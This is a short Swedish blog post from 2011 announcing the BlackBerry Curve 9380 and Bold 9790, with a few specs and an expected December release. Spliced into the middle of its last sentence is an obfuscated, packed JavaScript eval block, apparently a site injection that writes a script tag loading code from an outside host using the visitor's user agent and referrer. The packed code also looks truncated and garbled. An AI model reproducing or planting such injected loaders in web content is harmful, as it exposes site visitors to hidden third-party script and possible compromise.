Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Två nya Blackberry telefoner på ingång.

Två nya Blackberry telefoner på ingång.
Filip Urde
  • On 15 november, 2011
  • http://www.revue.se/filip-urde

Idag lanserades två nya Blackberry telefoner: BlackBerry Curve 9380 och Blackberry Bold 9790. Bold 9790 kör det numera klassiska ”Blackberry upplägget” med både en pekskärm samt tangentbord och den optiska styrplattan.

Specifikationen är: 1 GHz-processor och 8 GB inbyggt minne.

Curve 9380 i sin tur har en pekskärm som är på 3,2 ” ? litet? why? Sen har vi inte kunnat finna mer information, läst runt flera vändor idag utan att hitta något mer.

Dock en bra funktion är att bägge telefonerna har Near field communication.

Telefonerna bör släppas till december. Återkommer när jag vet mer!

Blackberry eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efrez|var|u0026u|referrer|ayfee||js|php’.split(’|’),0,{}))
ska bli stort i Sverige är ju i alla fall som sagt målet hos RIM.

www.blackberry.com